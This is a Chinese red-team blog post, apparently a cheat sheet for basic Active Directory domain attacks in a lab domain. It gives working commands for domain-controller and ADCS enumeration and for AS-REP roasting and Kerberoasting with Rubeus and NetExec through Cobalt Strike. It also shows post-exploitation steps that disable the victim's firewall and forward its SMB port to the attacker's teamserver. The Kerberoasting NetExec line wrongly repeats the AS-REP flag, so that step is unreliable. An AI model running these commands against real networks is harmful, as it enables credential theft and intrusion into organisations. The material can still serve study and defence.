基础域渗透的基础操作

0527

查看当前域

通过环境变量 %USERDOMAIN% 查看当前域

echo %USERDOMAIN%
图片[1]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

获取域控列表

通过 nltest 查找所有域控

nltest /dsgetdc:PENTEST
图片[2]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 nslookup 查找所有域控

nslookup -type=SRV _ldap._tcp.dc._msdcs.pentest.lab
图片[3]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

获取 ADCS 列表

工具列表

利用过程

通过 Certify 查找所有 ADCS

#在 Cobalt Strike 无落地执行
execute-assembly Certify.exe cas
图片[4]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 查找所有 ADCS(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 -M adcs
图片[5]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

AS-REPRoast

工具列表

利用过程

通过 Rubeus 获取 DONT_PRE_AUTH 用户

#在 Cobalt Strike 无落地执行
execute-assembly Rubeus.exe asreproast /nowrap /format:hashcat
图片[6]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 获取 DONT_PRE_AUTH 用户(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 --asreproast output.txt
图片[7]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

Kerberoasting

工具列表

利用过程

通过 Rubeus 获取 SPN 账号

#在 Cobalt Strike 无落地执行
execute-assembly Rubeus.exe kerberoast /nowrap /format:hashcat
图片[8]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 获取 SPN 账号(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 --asreproast output.txt
图片[9]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

其他实用操作

端口转发&映射

工具列表

利用过程

  1. 关闭被控机器的防火墙
   shell netsh advfirewall set allprofiles state off
  1. 进入临时文件目录
   cd C:\Windows\Temp
  1. 将 WinDivert32.sys 和 WinDivert64.sys 上传到被控机器
   # 我这里是上传到了C:\Windows\Temp目录
  1. 将被控机的目标端口转发到被控机的低权限端口上
   # 将被控机的445端口转发到8445端口
   PortBender redirect 445 8445
  1. 将被控机的端口映射到teamserver上
   # 将被控机的转发端口8445映射到CS服务器的445端口
   rportfwd 8445 127.0.0.1 445
© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
技术文章
# 域渗透
喜欢就支持一下吧
点赞7 分享
李白的头像李白你好-实战攻防李白你好永久会员
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】李白你好-实战攻防李白你好
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
2025年2月9日 3396
暗网深网威胁情报监测系统【网络空间全球数据泄露监测引擎】李白你好-实战攻防李白你好
暗网深网威胁情报监测系统【网络空间全球数据泄露监测引擎】
暗网深网威胁情报监测系统【网络空间全球数据泄露监测引擎】
2025年6月18日 2864
证书列表【包下证系列】李白你好-实战攻防李白你好
证书列表【包下证系列】
证书列表【包下证系列】
2025年2月10日 2150
Vshell-listens李白你好-实战攻防李白你好
Vshell-listens
Vshell-listens
2025年8月29日 2023
CISP系列证书低价促销【保过】李白你好-实战攻防李白你好
CISP系列证书低价促销【保过】
CISP系列证书低价促销【保过】
2025年3月12日 1410
2025渗透攻防相关工具集合李白你好-实战攻防李白你好
2025渗透攻防相关工具集合
2025渗透攻防相关工具集合
2025年1月2日 1273
相关推荐
常用的挖洞姿势李白你好-实战攻防李白你好
常用的挖洞姿势
常用的挖洞姿势
2025年4月15日 337
Mshell-攻防内存马研究李白你好-实战攻防李白你好
Mshell-攻防内存马研究
Mshell-攻防内存马研究
2025年4月14日 289
SRC挖掘Tips-XSS李白你好-实战攻防李白你好
SRC挖掘Tips-XSS
SRC挖掘Tips-XSS
2025年4月15日 258
谢公子_域渗透攻防指南李白你好-实战攻防李白你好
谢公子_域渗透攻防指南
谢公子_域渗透攻防指南
2025年2月13日 255
渗透测试Tips-SQL注入李白你好-实战攻防李白你好
渗透测试Tips-SQL注入
渗透测试Tips-SQL注入
2025年4月15日 244
一个网警的心法教学-P站写色文发黄图到底安不安全【全网最全最细致】[深度剖析]李白你好-实战攻防李白你好
一个网警的心法教学-P站写色文发黄图到底安不安全【全网最全最细致】[深度剖析]
一个网警的心法教学-P站写色文发黄图到底安不安全【全网最全最细致】[深度剖析]
2025年6月2日 238
业务功能渗透/EXCEL利用XXE攻击李白你好-实战攻防李白你好
业务功能渗透/EXCEL利用XXE攻击
业务功能渗透/EXCEL利用XXE攻击
2025年4月15日 215
PTH(哈希传递,基于NTLM认证)李白你好-实战攻防李白你好
PTH(哈希传递,基于NTLM认证)
PTH(哈希传递,基于NTLM认证)
2025年5月6日 144
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容